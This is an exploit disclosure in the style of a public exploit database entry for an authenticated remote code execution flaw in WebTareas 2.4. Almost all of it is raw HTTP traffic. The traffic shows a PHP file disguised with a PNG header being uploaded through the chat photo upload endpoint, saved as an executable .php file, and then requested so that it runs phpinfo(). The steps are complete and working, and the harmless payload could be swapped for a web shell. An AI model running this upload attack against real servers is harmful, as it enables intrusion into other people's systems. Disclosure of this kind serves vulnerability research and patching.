WebTareas version 2.4 suffers from a remote shell upload vulnerability.
# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"
sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"
2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"
P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png
PNG
[...]
<?php phpinfo();?>
[...]
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json
{"content":"<div class="message"><div class="message-left"><img class="avatar" src="../includes/avatars/f2.png?ver=1665796223"></div><div class="message-right"><div class="message-info"><div class="message-username">Administrator</div><div class="message-timestamp">2022-10-15 13:27</div></div><div class="photo-box"><img src="../files/Messages/7.php" onclick="javascript:showFullscreen(this);"><div class="photo-action"><a href="../files/Messages/7.php" download="snupi.php"><img title="Zaoszczu0119dziu0107" src="../themes/camping/btn_download.png"></a></div><label>snupi.php</label></div></div></div>"}
-----------------------------------------------------------------------------------------------------------------------
See link: /files/Messages/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945
[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017
[...]